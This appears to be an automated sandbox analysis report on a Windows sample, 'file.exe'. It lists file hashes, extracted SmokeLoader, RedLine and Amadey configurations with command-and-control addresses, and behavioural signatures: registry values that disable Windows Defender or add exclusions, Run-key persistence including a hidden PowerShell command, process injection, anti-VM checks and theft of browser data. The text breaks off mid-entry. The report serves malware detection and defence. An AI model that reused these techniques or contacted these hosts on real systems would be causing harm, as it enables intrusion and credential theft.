Resubmissions
05-11-2023 12:17
231105-pf2daaef81 1024-10-2023 23:16
231024-29g8qabd97 1024-10-2023 23:01
231024-2zjzkacb7s 10Analysis
-
max time kernel
463s -
max time network
467s -
platform
windows10-1703_x64 -
resource
win10-20231023-en -
resource tags
arch:x64arch:x86image:win10-20231023-enlocale:en-usos:windows10-1703-x64system -
submitted
24-10-2023 23:16
Static task
static1
General
-
Target
file.exe
-
Size
1.5MB
-
MD5
1b438e034879220d999d39613ae678b8
-
SHA1
827047c1557554f0afacfd0109bce4913e4c0d76
-
SHA256
53f135c8b723864adcb0ae7aa5d1ec5b3358c3ed37022fd5dc14f7ce2d0429b0
-
SHA512
e785d3db5af52dbfd225bda0bdce809b1ac7dd77bd739f54831e4e1b45e02a901170cb5703bf8369d184723f244a6fd43e2d3d4d9d856e1051287926d2f9d538
-
SSDEEP
24576:3yPozbf3AxyTF4sVBKhkAHR9WAWm0eW25jDRvXgIBV7LkV3J8nDLv4snaGgJML10:CPof3Cy5KksWd/QDRoS12cLDnaFMLX
Malware Config
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
grome
77.91.124.86:19084
Extracted
amadey
3.89
http://77.91.124.1/theme/index.php
-
install_dir
fefffe8cea
-
install_file
explothe.exe
-
strings_key
36a96139c1118a354edf72b1080d4b2f
Extracted
redline
kinza
77.91.124.86:19084
Extracted
smokeloader
up3
Signatures
-
DcRat 15 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exefile.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4444 schtasks.exe 304 schtasks.exe 700 schtasks.exe 168 schtasks.exe 1000 schtasks.exe 1012 schtasks.exe 5784 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" file.exe 4192 schtasks.exe 1804 schtasks.exe 5492 schtasks.exe 3248 schtasks.exe 3848 schtasks.exe 2936 schtasks.exe 1092 schtasks.exe -
Glupteba payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/6016-1406-0x0000000002E30000-0x000000000371B000-memory.dmp family_glupteba behavioral1/memory/6016-1412-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba -
Processes:
AppLaunch.exe8EC2.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 8EC2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 8EC2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 8EC2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 8EC2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 8EC2.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/3012-75-0x0000000000400000-0x000000000043E000-memory.dmp family_redline behavioral1/memory/5456-775-0x0000000000B80000-0x0000000000BBE000-memory.dmp family_redline behavioral1/memory/4896-1353-0x0000000000400000-0x000000000047E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
Processes:
latestX.exeupdater.exedescription pid process target process PID 5484 created 3260 5484 latestX.exe Explorer.EXE PID 5484 created 3260 5484 latestX.exe Explorer.EXE PID 5484 created 3260 5484 latestX.exe Explorer.EXE PID 5484 created 3260 5484 latestX.exe Explorer.EXE PID 5484 created 3260 5484 latestX.exe Explorer.EXE PID 5604 created 3260 5604 updater.exe Explorer.EXE PID 5604 created 3260 5604 updater.exe Explorer.EXE PID 5604 created 3260 5604 updater.exe Explorer.EXE PID 5604 created 3260 5604 updater.exe Explorer.EXE PID 5604 created 3260 5604 updater.exe Explorer.EXE PID 5604 created 3260 5604 updater.exe Explorer.EXE -
Processes:
31839b57a4f11171d6abc8bbc4451ee4.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 248 3304 rundll32.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
updater.exelatestX.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts updater.exe File created C:\Windows\System32\drivers\etc\hosts latestX.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
vaxPtPs.execmd.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Control Panel\International\Geo\Nation vaxPtPs.exe Key value queried \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 59 IoCs
Processes:
Yj1WX27.exevh4hc74.exenF6Lt05.exeTN7Pe86.exeVy4Zf18.exe1Iz10bE7.exe2Hu0424.exe3Pp48oh.exe4LF780EA.exe5Ny9PH9.exeexplothe.exe6Kg3IZ2.exe7HZ9qx58.exeyb9ls3GZ.exe85F4.exePA3Ij9az.exe8AB8.exeye0fC7ZR.exeSJ3EA0VH.exe1Xf60zx0.exe8D1B.exe8EC2.exe91EF.exe2fr169sf.exe4449.exe4822.exetoolspub2.exe31839b57a4f11171d6abc8bbc4451ee4.exesetup.exekos2.exeInstall.exelatestX.exe515A.exeset16.exeInstall.exeK.exeis-OVUC4.tmptoolspub2.exeMyBurn.exeMyBurn.exeexplothe.exe8D0D.exeAB44.exe31839b57a4f11171d6abc8bbc4451ee4.exeupdater.execsrss.exetJYzbog.exeexplothe.exeinjector.exewindefender.exewindefender.exevaxPtPs.exeexplothe.exef801950a962ddba14caaa44bf084b55c.exeexplothe.exeexplothe.exeexplothe.exeexplothe.exepid process 520 Yj1WX27.exe 3444 vh4hc74.exe 1344 nF6Lt05.exe 2228 TN7Pe86.exe 2960 Vy4Zf18.exe 2996 1Iz10bE7.exe 2544 2Hu0424.exe 4260 3Pp48oh.exe 1012 4LF780EA.exe 5032 5Ny9PH9.exe 4224 explothe.exe 2320 6Kg3IZ2.exe 4376 7HZ9qx58.exe 5112 yb9ls3GZ.exe 4656 85F4.exe 520 PA3Ij9az.exe 3688 8AB8.exe 5112 yb9ls3GZ.exe 4396 ye0fC7ZR.exe 2336 SJ3EA0VH.exe 304 1Xf60zx0.exe 3536 8D1B.exe 5152 8EC2.exe 5204 91EF.exe 5456 2fr169sf.exe 1680 4449.exe 4368 4822.exe 5168 toolspub2.exe 6016 31839b57a4f11171d6abc8bbc4451ee4.exe 4552 setup.exe 5944 kos2.exe 5892 Install.exe 5484 latestX.exe 4896 515A.exe 220 set16.exe 4392 Install.exe 5808 K.exe 4576 is-OVUC4.tmp 5712 toolspub2.exe 4452 MyBurn.exe 5776 MyBurn.exe 3560 explothe.exe 5792 8D0D.exe 5628 AB44.exe 3488 31839b57a4f11171d6abc8bbc4451ee4.exe 5604 updater.exe 5564 csrss.exe 408 tJYzbog.exe 4516 explothe.exe 5680 injector.exe 5528 windefender.exe 2824 windefender.exe 5668 vaxPtPs.exe 6056 explothe.exe 6064 f801950a962ddba14caaa44bf084b55c.exe 5904 explothe.exe 2664 explothe.exe 6032 explothe.exe 2812 explothe.exe -
Loads dropped DLL 7 IoCs
Processes:
rundll32.exeis-OVUC4.tmp515A.exerundll32.exepid process 5744 rundll32.exe 4576 is-OVUC4.tmp 4576 is-OVUC4.tmp 4576 is-OVUC4.tmp 4896 515A.exe 4896 515A.exe 3304 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 51.159.66.125 -
Processes:
31839b57a4f11171d6abc8bbc4451ee4.exe8EC2.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8EC2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
Processes:
Vy4Zf18.exe85F4.exeTN7Pe86.exe31839b57a4f11171d6abc8bbc4451ee4.execsrss.exefile.exeYj1WX27.exeye0fC7ZR.exeSJ3EA0VH.exe4822.exePA3Ij9az.exeyb9ls3GZ.exevh4hc74.exenF6Lt05.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" Vy4Zf18.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 85F4.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" TN7Pe86.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" file.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" Yj1WX27.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" ye0fC7ZR.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" SJ3EA0VH.exe Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\4822.exe'\"" 4822.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" PA3Ij9az.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" yb9ls3GZ.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" vh4hc74.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" nF6Lt05.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
vaxPtPs.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json vaxPtPs.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json vaxPtPs.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
vaxPtPs.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini vaxPtPs.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 40 IoCs
Processes:
powershell.exepowershell.exevaxPtPs.exereg.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exerundll32.execmd.exeInstall.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive reg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies vaxPtPs.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB vaxPtPs.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA vaxPtPs.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 vaxPtPs.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini cmd.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA vaxPtPs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 vaxPtPs.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol cmd.exe -
Suspicious use of SetThreadContext 9 IoCs
Processes:
1Iz10bE7.exe2Hu0424.exe4LF780EA.exe1Xf60zx0.exetoolspub2.exe8D0D.exeAB44.exeupdater.exedescription pid process target process PID 2996 set thread context of 3804 2996 1Iz10bE7.exe AppLaunch.exe PID 2544 set thread context of 3908 2544 2Hu0424.exe AppLaunch.exe PID 1012 set thread context of 3012 1012 4LF780EA.exe AppLaunch.exe PID 304 set thread context of 5412 304 1Xf60zx0.exe AppLaunch.exe PID 5168 set thread context of 5712 5168 toolspub2.exe toolspub2.exe PID 5792 set thread context of 1364 5792 8D0D.exe ADelRCP.exe PID 5628 set thread context of 6040 5628 AB44.exe jsc.exe PID 5604 set thread context of 5732 5604 updater.exe conhost.exe PID 5604 set thread context of 5840 5604 updater.exe explorer.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
31839b57a4f11171d6abc8bbc4451ee4.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe -
Drops file in Program Files directory 28 IoCs
Processes:
is-OVUC4.tmpvaxPtPs.exeupdater.exelatestX.exedescription ioc process File created C:\Program Files (x86)\MyBurn\is-LHCAN.tmp is-OVUC4.tmp File created C:\Program Files (x86)\MyBurn\is-97VCB.tmp is-OVUC4.tmp File created C:\Program Files (x86)\MyBurn\Sounds\is-71E0K.tmp is-OVUC4.tmp File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi vaxPtPs.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi vaxPtPs.exe File created C:\Program Files (x86)\MyBurn\is-7C1NN.tmp is-OVUC4.tmp File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat is-OVUC4.tmp File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files (x86)\oVhJPNkDU\pdqXAj.dll vaxPtPs.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak vaxPtPs.exe File created C:\Program Files (x86)\DlbZONUGhjVU2\ayneOMs.xml vaxPtPs.exe File created C:\Program Files (x86)\KrPQunXfXpAVC\MOkOKDM.dll vaxPtPs.exe File created C:\Program Files (x86)\MyBurn\is-2B50N.tmp is-OVUC4.tmp File created C:\Program Files\Google\Chrome\updater.exe latestX.exe File created C:\Program Files (x86)\DlbZONUGhjVU2\lpbdoqIXbAWjc.dll vaxPtPs.exe File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\MeffiZk.xml vaxPtPs.exe File created C:\Program Files (x86)\KrPQunXfXpAVC\NsLzZct.xml vaxPtPs.exe File created C:\Program Files (x86)\GpfcWYRxKqUn\YvxqZuh.dll vaxPtPs.exe File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe is-OVUC4.tmp File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja vaxPtPs.exe File created C:\Program Files (x86)\MyBurn\unins000.dat is-OVUC4.tmp File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\waAdHuj.dll vaxPtPs.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak vaxPtPs.exe File created C:\Program Files (x86)\oVhJPNkDU\oKlhKdZ.xml vaxPtPs.exe File created C:\Program Files (x86)\MyBurn\is-AKIV0.tmp is-OVUC4.tmp File created C:\Program Files (x86)\MyBurn\is-U2KCO.tmp is-OVUC4.tmp File created C:\Program Files (x86)\MyBurn\Sounds\is-GDIG8.tmp is-OVUC4.tmp File created C:\Program Files (x86)\MyBurn\is-2P6RO.tmp is-OVUC4.tmp -
Drops file in Windows directory 23 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdgeCP.execsrss.exeschtasks.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe31839b57a4f11171d6abc8bbc4451ee4.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe515A.exeschtasks.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeschtasks.exeschtasks.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\ztlTbPYifermRZH.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rss\csrss.exe 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File opened for modification 